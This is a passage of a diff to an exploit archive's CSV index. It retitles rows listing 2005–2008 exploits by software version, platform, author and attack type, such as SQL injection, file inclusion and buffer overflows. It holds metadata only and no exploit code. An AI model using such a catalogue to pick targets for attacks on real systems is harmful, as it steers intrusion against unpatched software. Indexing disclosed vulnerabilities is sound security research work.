Malewski",windows,dos,0 1001,platforms/aix/local/1001.txt,"AIX 5.1 Bellmail Local Race Condition Exploit Exploit",2005-05-19,watercloud,aix,local,0 1003,platforms/php/webapps/1003.c,"Fusion SBX <= 1.2 - Remote Command Execution Exploit",2005-05-20,Silentium,php,webapps,0 -1004,platforms/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2nd updated)",2005-05-20,Nikyt0x,cgi,webapps,0 -1005,platforms/cgi/webapps/1005.pl,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (1st)",2005-05-20,Alpha_Programmer,cgi,webapps,0 +1004,platforms/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2)",2005-05-20,Nikyt0x,cgi,webapps,0 +1005,platforms/cgi/webapps/1005.pl,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (1)",2005-05-20,Alpha_Programmer,cgi,webapps,0 1006,platforms/php/webapps/1006.pl,"Woltlab Burning Board <= 2.3.1 register.php SQL-Injection Exploit",2005-05-20,deluxe89,php,webapps,0 1007,platforms/multiple/remote/1007.html,"Mozilla Firefox view-source:javascript url Code Execution Exploit",2005-05-21,mikx,multiple,remote,0 1008,platforms/multiple/dos/1008.c,"TCP TIMESTAMPS Denial of Service Exploit",2005-05-21,"Daniel Hartmeier",multiple,dos,0 1009,platforms/linux/local/1009.c,"Exim <= 4.41 - dns_build_reverse Local Exploit",2005-05-25,Plugger,linux,local,0 -1010,platforms/asp/webapps/1010.pl,"Maxwebportal <= 1.36 password.asp Change Password Exploit (3 - perl)",2005-05-26,Alpha_Programmer,asp,webapps,0 -1011,platforms/asp/webapps/1011.php,"Maxwebportal <= 1.36 password.asp Change Password Exploit (2 - php)",2005-05-26,mh_p0rtal,asp,webapps,0 -1012,platforms/asp/webapps/1012.txt,"Maxwebportal <= 1.36 password.asp Change Password Exploit (1 - html)",2005-05-26,"Soroush Dalili",asp,webapps,0 +1010,platforms/asp/webapps/1010.pl,"Maxwebportal <= 1.36 password.asp Change Password Exploit (3) (perl)",2005-05-26,Alpha_Programmer,asp,webapps,0 +1011,platforms/asp/webapps/1011.php,"Maxwebportal <= 1.36 password.asp Change Password Exploit (2) (php)",2005-05-26,mh_p0rtal,asp,webapps,0 +1012,platforms/asp/webapps/1012.txt,"Maxwebportal <= 1.36 password.asp Change Password Exploit (1) (html)",2005-05-26,"Soroush Dalili",asp,webapps,0 1013,platforms/php/webapps/1013.pl,"Invision Power Board <= 2.0.3 - Login.php SQL Injection Exploit",2005-05-26,"Petey Beege",php,webapps,0 1014,platforms/php/webapps/1014.txt,"Invision Power Board <= 2.0.3 - Login.php SQL Injection (tutorial)",2005-05-27,"Danica Jones",php,webapps,0 1015,platforms/asp/webapps/1015.txt,"Hosting Controller <= 0.6.1 Unauthenticated User Registeration (3rd)",2005-05-27,"Soroush Dalili",asp,webapps,0 @@ -931,7 +931,7 @@ id,file,description,date,author,platform,type,port 1123,platforms/linux/remote/1123.c,"GNU Mailutils imap4d <= 0.6 - Remote Format String Exploit",2005-08-01,CoKi,linux,remote,143 1124,platforms/linux/remote/1124.pl,"IPSwitch IMail Server <= 8.15 - IMAPD Remote Root Exploit",2005-08-01,kingcope,linux,remote,143 1126,platforms/windows/dos/1126.c,"BusinessMail Server <= 4.60.00 - Remote Denial of Service Exploit",2005-08-01,Kozan,windows,dos,0 -1127,platforms/windows/dos/1127.cpp,"ProRat Server <= 1.9 - (Fix-2) Buffer Overflow Crash Exploit",2005-08-01,"evil dabus",windows,dos,0 +1127,platforms/windows/dos/1127.cpp,"ProRat Server <= 1.9 (Fix-2) - Buffer Overflow Crash Exploit",2005-08-01,"evil dabus",windows,dos,0 1128,platforms/windows/local/1128.c,"Microsoft Windows - (LegitCheckControl.dll) Genuine Advantage Validation Patch",2005-08-01,HaCkZaTaN,windows,local,0 1129,platforms/windows/dos/1129.c,"Quick 'n EasY <= 3.0 FTP Server Remote Denial of Service Exploit",2005-08-02,Kozan,windows,dos,0 1130,platforms/windows/remote/1130.c,"CA BrightStor ARCserve Backup Agent (dbasqlr.exe) Remote Exploit",2005-08-03,cybertronic,windows,remote,6070 @@ -1122,7 +1122,7 @@ id,file,description,date,author,platform,type,port 1345,platforms/php/dos/1345.php,"Xaraya <= 1.0.0 RC4 - create() Denial of Service Exploit",2005-11-29,rgod,php,dos,0 1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile - (mtNoObjects) Denial of Service Exploit (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 - (phgrafx) Local Buffer Overflow Exploit (x86)",2005-11-30,"p. minervini",qnx,local,0 -1352,platforms/windows/remote/1352.cpp,"Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated)",2005-12-01,Swan,windows,remote,0 +1352,platforms/windows/remote/1352.cpp,"Microsoft Windows - DTC Remote Exploit (PoC) (MS05-051) (2)",2005-12-01,Swan,windows,remote,0 1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple PreAuth Remote Stack Overflow PoC",2005-12-02,Sowhat,windows,dos,0 1354,platforms/php/webapps/1354.php,"Zen Cart <= 1.2.6d (password_forgotten.php) SQL Injection Exploit",2005-12-02,rgod,php,webapps,0 1355,platforms/linux/remote/1355.pl,"sobexsrv 1.0.0_pre3 Bluetooth syslog() Remote Format String Exploit",2005-12-03,"Kevin Finisterre",linux,remote,0 @@ -1152,7 +1152,7 @@ id,file,description,date,author,platform,type,port 1379,platforms/php/webapps/1379.php,"PHPGedView <= 3.3.7 - Arbitrary Remote Code Execution Exploit",2005-12-20,rgod,php,webapps,0 1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 - (IMAPd) Remote Overflow Exploit",2005-12-20,muts,windows,remote,143 1381,platforms/windows/remote/1381.pm,"Golden FTP Server <= 1.92 - (APPE) Remote Overflow Exploit (Metasploit)",2005-12-20,redsand,windows,remote,21 -1382,platforms/php/webapps/1382.pl,"phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (updated)",2006-02-20,DarkFig,php,webapps,0 +1382,platforms/php/webapps/1382.pl,"phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (2)",2006-02-20,DarkFig,php,webapps,0 1383,platforms/php/webapps/1383.txt,"phpBB <= 2.0.18 - Remote XSS Cookie Disclosure Exploit",2005-12-21,jet,php,webapps,0 1385,platforms/php/webapps/1385.pl,"PHP-Fusion 6.00.3 - (rating) Parameter Remote SQL Injection Exploit",2005-12-23,krasza,php,webapps,0 1387,platforms/php/webapps/1387.php,"Dev Web Management System <= 1.5 - (cat) Remote SQL Injection Exploit",2005-12-24,rgod,php,webapps,0 @@ -1210,7 +1210,7 @@ id,file,description,date,author,platform,type,port 1462,platforms/windows/remote/1462.cpp,"Sami FTP Server 2.0.1 - Remote Buffer Overflow Exploit (cpp)",2006-01-31,HolyGhost,windows,remote,21 1463,platforms/windows/remote/1463.pm,"SoftiaCom WMailserver 1.0 - SMTP Remote Buffer Overflow Exploit (Metasploit)",2006-02-01,y0,windows,remote,21 1464,platforms/hardware/dos/1464.c,"Arescom NetDSL-1000 - (telnetd) Remote Denial of Service Exploit",2006-02-02,"Fabian Ramirez",hardware,dos,0 -1465,platforms/windows/local/1465.c,"Microsoft Windows - ACLs Local Privilege Escalation Exploit (Updated)",2006-02-12,"Andres Tarasco",windows,local,0 +1465,platforms/windows/local/1465.c,"Microsoft Windows - ACLs Local Privilege Escalation Exploit (2)",2006-02-12,"Andres Tarasco",windows,local,0 1466,platforms/windows/remote/1466.pl,"eXchange POP3 5.0.050203 - (rcpt to) Remote Buffer Overflow Exploit",2006-02-03,"securma massine",windows,remote,25 1467,platforms/php/webapps/1467.php,"LoudBlog <= 0.4 - (path) Arbitrary Remote Inclusion Exploit",2006-02-03,rgod,php,webapps,0 1468,platforms/php/webapps/1468.php,"Clever Copy <= 3.0 Admin Auth Details / Remote SQL Injection Exploit",2006-02-04,rgod,php,webapps,0 @@ -1934,7 +1934,7 @@ id,file,description,date,author,platform,type,port 2237,platforms/multiple/dos/2237.sh,"Apache < 1.3.37 / 2.0.59 / 2.2.3 - (mod_rewrite) Remote Overflow PoC",2006-08-21,"Jacobo Avariento",multiple,dos,0 2238,platforms/windows/dos/2238.html,"Microsoft Internet Explorer Multiple COM Object Color Property DoS",2006-08-21,nop,windows,dos,0 2239,platforms/php/webapps/2239.txt,"Empire CMS <= 3.7 - (checklevel.php) Remote File Include",2006-08-22,"Bob Linuson",php,webapps,0 -2240,platforms/php/webapps/2240.txt,"HPE <= 1.0 - (HPEinc) Remote File Include Vulnerabilities (updated)",2006-08-22,"the master",php,webapps,0 +2240,platforms/php/webapps/2240.txt,"HPE <= 1.0 - (HPEinc) Remote File Include Vulnerabilities (2)",2006-08-22,"the master",php,webapps,0 2241,platforms/solaris/local/2241.c,"Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure Exploit",2006-08-22,"Marco Ivaldi",solaris,local,0 2242,platforms/solaris/local/2242.sh,"Solaris 8 / 9 - (/usr/ucb/ps) Local Information Leak Exploit",2006-08-22,"Marco Ivaldi",solaris,local,0 2243,platforms/php/webapps/2243.php,"Simple Machines Forum <= 1.1 rc2 Lock Topics Remote Exploit",2006-08-22,rgod,php,webapps,0 @@ -2215,7 +2215,7 @@ id,file,description,date,author,platform,type,port 2519,platforms/php/webapps/2519.txt,"Minichat 6.0 - (ftag.php) Remote File Include",2006-10-11,Zickox,php,webapps,0 2520,platforms/php/webapps/2520.txt,"Softerra PHP Developer Library <= 1.5.3 - File Include Vulnerabilities",2006-10-12,MP,php,webapps,0 2521,platforms/php/webapps/2521.txt,"Download-Engine <= 1.4.2 - (spaw) Remote File Include",2006-10-12,v1per-haCker,php,webapps,0 -2522,platforms/php/webapps/2522.txt,"phpBB Journals System Mod 1.0.2 [RC2] - Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0 +2522,platforms/php/webapps/2522.txt,"phpBB Journals System Mod 1.0.2 RC2 - Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0 2523,platforms/windows/dos/2523.pl,"Microsoft Office 2003 PPT Local Buffer Overflow PoC",2006-10-12,Nanika,windows,dos,0 2524,platforms/bsd/dos/2524.c,"FreeBSD 5.4 / 6.0 - (ptrace PT_LWPINFO) Local Denial of Service Exploit",2006-10-12,kokanin,bsd,dos,0 2525,platforms/php/webapps/2525.pl,"phpBB Insert User Mod <= 0.1.2 - Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0 @@ -2385,7 +2385,7 @@ id,file,description,date,author,platform,type,port 2692,platforms/php/webapps/2692.txt,"GEPI <= 1.4.0 gestion/savebackup.php Remote File Include",2006-10-31,"Sumit Siddharth",php,webapps,0 2693,platforms/php/webapps/2693.txt,"PwsPHP <= 1.1 - (themes/fin.php) Remote File Include Vulnerablity",2006-10-31,3l3ctric-Cracker,php,webapps,0 2694,platforms/php/webapps/2694.php,"T.G.S. CMS <= 0.1.7 - (logout.php) Remote SQL Injection Exploit",2006-10-31,Kacper,php,webapps,0 -2695,platforms/multiple/dos/2695.html,"Mozilla Firefox <= 1.5.0.7/ 2.0 - (createRange) Remote DoS Exploit",2006-10-31,"Gotfault Security",multiple,dos,0 +2695,platforms/multiple/dos/2695.html,"Mozilla Firefox <= 1.5.0.7/2.0 - (createRange) Remote DoS Exploit",2006-10-31,"Gotfault Security",multiple,dos,0 2696,platforms/php/webapps/2696.php,"Invision Power Board <= 2.1.7 - (Debug) Remote Password Change Exploit",2006-11-01,Rapigator,php,webapps,0 2697,platforms/php/webapps/2697.php,"Innovate Portal <= 2.0 - (acp.php) Remote Code Execution Exploit",2006-11-01,Kacper,php,webapps,0 2698,platforms/php/webapps/2698.pl,"2BGal 3.0 - (admin/configuration.inc.php) Local Inclusion Exploit",2006-11-01,Kw3[R]Ln,php,webapps,0 @@ -3017,7 +3017,7 @@ id,file,description,date,author,platform,type,port 3347,platforms/windows/dos/3347.cpp,"FTP Explorer 1.0.1 Build 047 - (CPU consumption) Remote DoS Exploit",2007-02-20,Marsu,windows,dos,0 3348,platforms/php/webapps/3348.txt,"SendStudio <= 2004.14 - (ROOTDIR) Remote File Inclusion",2007-02-20,K-159,php,webapps,0 3349,platforms/windows/local/3349.c,"News Bin Pro 5.33 - (.NBI) Local Buffer Overflow Exploit",2007-02-21,Marsu,windows,local,0 -3350,platforms/windows/dos/3350.html,"BrowseDialog Class (ccrpbds6.dll) Multiple Methods DoS Exploit",2007-02-21,shinnai,windows,dos,0 +3350,platforms/windows/dos/3350.html,"BrowseDialog Class - (ccrpbds6.dll) Multiple Methods DoS Exploit",2007-02-21,shinnai,windows,dos,0 3351,platforms/php/webapps/3351.pl,"webSPELL <= 4.01.02 - (topic) Remote SQL Injection Exploit",2007-02-21,DNX,php,webapps,0 3352,platforms/php/webapps/3352.php,"Connectix Boards <= 0.7 - (p_skin) Multiple Vulnerabilities",2007-02-21,DarkFig,php,webapps,0 3353,platforms/php/webapps/3353.txt,"DBImageGallery 1.2.2 - (donsimg_base_path) RFI Vulnerabilities",2007-02-21,Denven,php,webapps,0 @@ -3073,14 +3073,14 @@ id,file,description,date,author,platform,type,port 3404,platforms/multiple/dos/3404.php,"PHP wddx_deserialize() String Append Crash Exploit",2007-03-04,"Stefan Esser",multiple,dos,0 3405,platforms/multiple/remote/3405.txt,"PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS",2007-03-04,"Stefan Esser",multiple,remote,0 3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 - (eintrag.php sqllog) Remote File Include Exploit",2007-03-04,bd0rk,php,webapps,0 -3407,platforms/multiple/dos/3407.c,"Asterisk <= 1.2.15 - / 1.4.0 pre-auth Remote Denial of Service Exploit",2007-03-04,fbffff,multiple,dos,0 +3407,platforms/multiple/dos/3407.c,"Asterisk <= 1.2.15 / 1.4.0 - pre-auth Remote Denial of Service Exploit",2007-03-04,fbffff,multiple,dos,0 3408,platforms/php/webapps/3408.pl,"AJ Auction Pro - (subcat.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 3409,platforms/php/webapps/3409.htm,"AJ Dating 1.0 - (view_profile.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 - (postingdetails.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 3411,platforms/php/webapps/3411.pl,"AJ Forum 1.0 - (topic_title.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 3412,platforms/cgi/webapps/3412.txt,"RRDBrowse <= 1.6 - Remote Arbitrary File Disclosure",2007-03-04,"Sebastian Wolfgarten",cgi,webapps,0 -3413,platforms/multiple/local/3413.php,"PHP < 4.4.5 - / 5.2.1 php_binary Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0 -3414,platforms/multiple/local/3414.php,"PHP < 4.4.5 - / 5.2.1 WDDX Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0 +3413,platforms/multiple/local/3413.php,"PHP < 4.4.5 - / 5.2.1 - php_binary Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0 +3414,platforms/multiple/local/3414.php,"PHP < 4.4.5 - / 5.2.1 - WDDX Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0 3415,platforms/linux/dos/3415.html,"Konqueror 3.5.5 - (JavaScript Read of FTP Iframe) DoS Exploit",2007-03-05,mark,linux,dos,0 3416,platforms/php/webapps/3416.pl,"Links Management Application 1.0 - (lcnt) Remote SQL Injection Exploit",2007-03-05,ajann,php,webapps,0 3417,platforms/windows/local/3417.php,"PHP <= 4.4.6 - mssql_[p]connect() Local Buffer Overflow Exploit",2007-03-05,rgod,windows,local,0 @@ -3162,7 +3162,7 @@ id,file,description,date,author,platform,type,port 3496,platforms/php/webapps/3496.php,"Php-Stats <= 0.1.9.1b (PC-REMOTE-ADDR) SQL Injection Exploit",2007-03-16,rgod,php,webapps,0 3497,platforms/php/webapps/3497.php,"Php-Stats <= 0.1.9.1b (ip) Remote SQL Injection Exploit",2007-03-16,rgod,php,webapps,0 3498,platforms/php/webapps/3498.txt,"Creative Files 1.2 - (kommentare.php) Remote SQL Injection",2007-03-16,"Mehmet Ince",php,webapps,0 -3499,platforms/linux/local/3499.php,"PHP <= 4.4.6 - / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit",2007-03-16,"Stefan Esser",linux,local,0 +3499,platforms/linux/local/3499.php,"PHP <= 4.4.6 / 5.2.1 - array_user_key_compare() ZVAL dtor Local Exploit",2007-03-16,"Stefan Esser",linux,local,0 3500,platforms/php/webapps/3500.htm,"Particle Blogger <= 1.2.0 - (post.php postid) Remote SQL Injection Exploit",2007-03-16,WiLdBoY,php,webapps,0 3501,platforms/php/webapps/3501.txt,"PHP DB Designer <= 1.02 - Remote File Include Vulnerabilities",2007-03-16,GoLd_M,php,webapps,0 3502,platforms/php/webapps/3502.php,"Php-Stats <= 0.1.9.1b (php-stats-options.php) admin 2 exec() eExploit",2007-03-17,rgod,php,webapps,0 @@ -3187,7 +3187,7 @@ id,file,description,date,author,platform,type,port 3521,platforms/php/webapps/3521.pl,"pragmaMX Module Landkarten 2.1 - Local File Inclusion Exploit (Windows)",2007-03-19,bd0rk,php,webapps,0 3522,platforms/php/webapps/3522.pl,"GeBlog 0.1 - GLOBALS[tplname] Local File Inclusion Exploit (Windows)",2007-03-20,GoLd_M,php,webapps,0 3524,platforms/php/webapps/3524.txt,"PHP-Nuke Module htmltonuke 2.0alpha - (htmltonuke.php) RFI",2007-03-20,"Cold Zero",php,webapps,0 -3525,platforms/linux/local/3525.php,"PHP <= 4.4.6 - / 5.2.1 ext/gd Already Freed Resources Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0 +3525,platforms/linux/local/3525.php,"PHP <= 4.4.6 / 5.2.1 - ext/gd Already Freed Resources Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0 3526,platforms/hardware/dos/3526.pl,"Cisco Phone 7940/7960 - (SIP INVITE) Remote Denial of Service Exploit",2007-03-20,MADYNES,hardware,dos,0 3527,platforms/windows/dos/3527.pl,"Mercur IMAPD 5.00.14 - Remote Denial of Service Exploit (Win32)",2007-03-20,mu-b,windows,dos,0 3528,platforms/php/webapps/3528.pl,"phpRaid < 3.0.7 - (rss.php phpraid_dir) Remote File Inclusion Exploit",2007-03-20,"Cold Zero",php,webapps,0 @@ -3227,13 +3227,13 @@ id,file,description,date,author,platform,type,port 3563,platforms/php/webapps/3563.txt,"ttCMS <= 4 - (ez_sql.php lib_path) Remote File Inclusion",2007-03-24,Kacper,php,webapps,0 3564,platforms/php/webapps/3564.pl,"Joomla Component Car Manager <= 1.1 - Remote SQL Injection Exploit",2007-03-24,ajann,php,webapps,0 3565,platforms/php/webapps/3565.pl,"Joomla Component RWCards <= 2.4.3 - Remote SQL Injection Exploit",2007-03-24,ajann,php,webapps,0 -3566,platforms/multiple/dos/3566.pl,"Asterisk <= 1.2.16 - / 1.4.1 SIP INVITE Remote Denial of Service Exploit",2007-03-25,MADYNES,multiple,dos,0 +3566,platforms/multiple/dos/3566.pl,"Asterisk <= 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service Exploit",2007-03-25,MADYNES,multiple,dos,0 3567,platforms/php/webapps/3567.pl,"Mambo Module Flatmenu <= 1.07 - Remote File Include Exploit",2007-03-25,"Cold Zero",php,webapps,0 3568,platforms/php/webapps/3568.txt,"Free Image Hosting <= 2.0 - (AD_BODY_TEMP) Remote File Inclusion Vulnerabilities",2007-03-25,Crackers_Child,php,webapps,0 3569,platforms/php/webapps/3569.pl,"PBlang <= 4.66z Remote Create Admin Exploit",2007-03-25,Hessam-x,php,webapps,0 3570,platforms/windows/remote/3570.c,"WarFTP 1.65 - (USER) Remote Buffer Overlow Exploit",2007-03-25,niXel,windows,remote,21 -3571,platforms/linux/local/3571.php,"PHP < 4.4.5 - / 5.2.1 _SESSION unset() Local Exploit",2007-03-25,"Stefan Esser",linux,local,0 -3572,platforms/linux/local/3572.php,"PHP < 4.4.5 - / 5.2.1 _SESSION Deserialization Overwrite Exploit",2007-03-25,"Stefan Esser",linux,local,0 +3571,platforms/linux/local/3571.php,"PHP < 4.4.5 - / 5.2.1 - _SESSION unset() Local Exploit",2007-03-25,"Stefan Esser",linux,local,0 +3572,platforms/linux/local/3572.php,"PHP < 4.4.5 - / 5.2.1 - _SESSION Deserialization Overwrite Exploit",2007-03-25,"Stefan Esser",linux,local,0 3574,platforms/php/webapps/3574.pl,"PBlang 4.66z Remote Code Execution Exploit",2007-03-25,Hessam-x,php,webapps,0 3575,platforms/windows/remote/3575.cpp,"Frontbase <= 4.2.7 - Remote Buffer Overflow Exploit (windows)",2007-03-25,Heretic2,windows,remote,0 3576,platforms/windows/local/3576.php,"PHP 5.2.1 with PECL phpDOC - Local Buffer Overflow Exploit",2007-03-25,rgod,windows,local,0 @@ -3246,7 +3246,7 @@ id,file,description,date,author,platform,type,port 3583,platforms/php/webapps/3583.txt,"C-Arbre <= 0.6PR7 - (root_path) Remote File Inclusion",2007-03-26,K-159,php,webapps,0 3584,platforms/multiple/remote/3584.pl,"Oracle 10g KUPM$MCP.MAIN - SQL Injection Exploit (2)",2007-03-27,bunker,multiple,remote,0 3585,platforms/multiple/remote/3585.pl,"Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit",2007-03-27,bunker,multiple,remote,0 -3586,platforms/linux/dos/3586.php,"PHP 4.4.5 - / 4.4.6 session_decode() Double Free Exploit PoC",2007-03-27,"Stefan Esser",linux,dos,0 +3586,platforms/linux/dos/3586.php,"PHP 4.4.5 / 4.4.6 - session_decode() Double Free Exploit PoC",2007-03-27,"Stefan Esser",linux,dos,0 3587,platforms/linux/local/3587.c,"Linux Kernel <= 2.6.20 with DCCP Support - Memory Disclosure Exploit (1)",2007-03-27,"Robert Swiecki",linux,local,0 3588,platforms/php/webapps/3588.pl,"XOOPS module Articles <= 1.02 - (print.php id) SQL Injection Exploit",2007-03-27,WiLdBoY,php,webapps,0 3589,platforms/windows/remote/3589.pm,"NaviCOPA Web Server 2.01 - Remote Buffer Overflow Exploit (Metasploit)",2007-03-27,skillTube,windows,remote,80 @@ -3263,11 +3263,11 @@ id,file,description,date,author,platform,type,port 3600,platforms/php/webapps/3600.txt,"Softerra Time-Assistant <= 6.2 - (inc_dir) Remote File Inclusion",2007-03-29,K-159,php,webapps,0 3601,platforms/php/webapps/3601.pl,"sBLOG 0.7.3 Beta (inc/lang.php) Local File Inclusion Exploit",2007-03-29,GoLd_M,php,webapps,0 3602,platforms/windows/dos/3602.py,"IBM Lotus Domino Server 6.5 - (username) Remote Denial of Service Exploit",2007-03-29,"Winny Thomas",windows,dos,0 -3603,platforms/php/webapps/3603.pl,"XOOPS Module MyAds Bug Fix <= 2.04jp (index.php) SQL Injection Exploit",2007-03-29,ajann,php,webapps,0 +3603,platforms/php/webapps/3603.pl,"XOOPS Module MyAds Bug Fix <= 2.04jp - (index.php) SQL Injection Exploit",2007-03-29,ajann,php,webapps,0 3604,platforms/windows/remote/3604.py,"CA BrightStor Backup 11.5.2.0 - (Mediasvr.exe) Remote Code Exploit",2007-03-29,Shirkdog,windows,remote,111 3605,platforms/php/webapps/3605.php,"Picture-Engine <= 1.2.0 - (wall.php cat) Remote SQL Injection Exploit",2007-03-29,Kacper,php,webapps,0 3606,platforms/multiple/dos/3606.py,"Mozilla Firefox 2.0.0.3 - / Gran Paradiso 3.0a3 DoS Hang / Crash Exploit",2007-03-29,shinnai,multiple,dos,0 -3607,platforms/php/webapps/3607.txt,"Kaqoo Auction (install_root) Multiple Remote File Include Vulnerabilities",2007-03-29,"ThE dE@Th",php,webapps,0 +3607,platforms/php/webapps/3607.txt,"Kaqoo Auction - (install_root) Multiple Remote File Include Vulnerabilities",2007-03-29,"ThE dE@Th",php,webapps,0 3608,platforms/php/webapps/3608.txt,"Advanced Login <= 0.7 - (root) Remote File Inclusion",2007-03-29,Bithedz,php,webapps,0 3609,platforms/linux/remote/3609.py,"Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux)",2007-03-30,"Winny Thomas",linux,remote,0 3610,platforms/windows/remote/3610.html,"ActSoft DVD-Tools - (dvdtools.ocx) Remote Buffer Overflow Exploit",2007-03-30,"Umesh Wanve",windows,remote,0 @@ -3843,7 +3843,7 @@ id,file,description,date,author,platform,type,port 4193,platforms/php/webapps/4193.txt,"QuickEStore <= 8.2 - (insertorder.cfm) Remote SQL Injection",2007-07-18,meoconx,php,webapps,0 4194,platforms/php/webapps/4194.txt,"Joomla Component Expose <= RC35 - Remote File Upload",2007-07-18,"Cold Zero",php,webapps,0 4195,platforms/php/webapps/4195.txt,"BBS E-Market (postscript.php p_mode) Remote File Inclusion",2007-07-18,mozi,php,webapps,0 -4196,platforms/multiple/dos/4196.c,"Asterisk < 1.2.22 - / 1.4.8 / 2.2.1 chan_skinny Remote Denial of Service",2007-07-18,fbffff,multiple,dos,0 +4196,platforms/multiple/dos/4196.c,"Asterisk < 1.2.22 / 1.4.8 / 2.2.1 - chan_skinny Remote Denial of Service",2007-07-18,fbffff,multiple,dos,0 4197,platforms/php/webapps/4197.txt,"phpBB Module SupaNav 1.0.0 - (link_main.php) RFI",2007-07-18,bd0rk,php,webapps,0 4198,platforms/asp/webapps/4198.txt,"A-shop <= 0.70 - Remote File Deletion",2007-07-18,Timq,asp,webapps,0 4199,platforms/php/webapps/4199.txt,"Md-Pro <= 1.0.8x (Topics topicid) Remote SQL Injection",2007-07-18,anonymous,php,webapps,0 @@ -3998,7 +3998,7 @@ id,file,description,date,author,platform,type,port 4349,platforms/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 - (category.php) Blind SQL Injection Exploit",2007-08-31,k1tk4t,php,webapps,0 4350,platforms/php/webapps/4350.php,"Joomla! 1.5 Beta1/Beta2/RC1 - Remote SQL Injection Exploit",2007-09-01,Silentz,php,webapps,0 4351,platforms/windows/remote/4351.html,"Yahoo! Messenger (YVerInfo.dll <= 2007.8.27.1) ActiveX BoF Exploit",2007-09-01,minhbq,windows,remote,0 -4352,platforms/php/webapps/4352.txt,"Weblogicnet (files_dir) Multiple Remote File Inclusion Vulnerabilities",2007-09-02,bius,php,webapps,0 +4352,platforms/php/webapps/4352.txt,"Weblogicnet - (files_dir) Multiple Remote File Inclusion Vulnerabilities",2007-09-02,bius,php,webapps,0 4353,platforms/php/webapps/4353.txt,"Yvora CMS 1.0 - (error_view.php ID) Remote SQL Injection",2007-09-02,k1tk4t,php,webapps,0 4354,platforms/windows/local/4354.py,"Virtual DJ 5.0 - (m3u File) Local Buffer OverFlow Exploit",2007-09-02,0x58,windows,local,0 4355,platforms/windows/local/4355.php,"OTSTurntables 1.00 - (m3u File) Local Buffer Overflow Exploit",2007-09-02,0x58,windows,local,0 @@ -4038,7 +4038,7 @@ id,file,description,date,author,platform,type,port 4389,platforms/windows/remote/4389.html,"Ultra Crypto Component (CryptoX.dll <= 2.0) Remote BoF Exploit",2007-09-10,shinnai,windows,remote,0 4390,platforms/php/webapps/4390.txt,"AuraCMS 2.1 - Remote File Attachment / LFI Vulnerabilities",2007-09-10,k1tk4t,php,webapps,0 4391,platforms/multiple/remote/4391.c,"Lighttpd <= 1.4.16 FastCGI Header Overflow Remote Exploit",2007-09-10,"Mattias Bengtsson",multiple,remote,0 -4392,platforms/multiple/local/4392.txt,"PHP <= 4.4.7 - / 5.2.3 MySQL/MySQLi Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0 +4392,platforms/multiple/local/4392.txt,"PHP <= 4.4.7 / 5.2.3 - MySQL/MySQLi Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0 4393,platforms/windows/remote/4393.html,"Microsoft Visual Studio 6.0 - (PDWizard.ocx) Remote Command Execution",2007-09-11,shinnai,windows,remote,0 4394,platforms/windows/remote/4394.html,"Microsoft Visual Studio 6.0 - (VBTOVSI.DLL 1.0.0.0) File Overwrite Exploit",2007-09-11,shinnai,windows,remote,0 4395,platforms/php/webapps/4395.txt,"NuclearBB Alpha 2 - (root_path) Remote File Inclusion",2007-09-11,"Rootshell Security",php,webapps,0 @@ -4098,7 +4098,7 @@ id,file,description,date,author,platform,type,port 4450,platforms/windows/remote/4450.py,"Xitami Web Server 2.5 - (If-Modified-Since) Remote BoF Exploit (0Day)",2007-09-24,h07,windows,remote,80 4451,platforms/php/webapps/4451.txt,"DFD Cart 1.1 - Multiple Remote File Inclusion Vulnerabilities",2007-09-24,BiNgZa,php,webapps,0 4452,platforms/windows/remote/4452.html,"AskJeeves Toolbar 4.0.2.53 - ActiveX Remote Buffer Overflow Exploit",2007-09-24,"Joey Mengele",windows,remote,0 -4453,platforms/windows/remote/4453.html,"EB Design Pty Ltd (EBCRYPT.DLL 2.0) Multiple Remote Vulnerabilites",2007-09-24,shinnai,windows,remote,0 +4453,platforms/windows/remote/4453.html,"EB Design Pty Ltd - (EBCRYPT.DLL 2.0) Multiple Remote Vulnerabilites",2007-09-24,shinnai,windows,remote,0 4454,platforms/php/webapps/4454.txt,"sk.log <= 0.5.3 - (skin_url) Remote File Inclusion",2007-09-24,w0cker,php,webapps,0 4455,platforms/windows/remote/4455.pl,"Motorola Timbuktu Pro <= 8.6.5 File Deletion/Creation Exploit",2008-03-11,titon,windows,remote,0 4456,platforms/php/webapps/4456.txt,"FrontAccounting 1.13 - Remote File Inclusion Vulnerabilities",2007-09-26,kezzap66345,php,webapps,0 @@ -4596,7 +4596,7 @@ 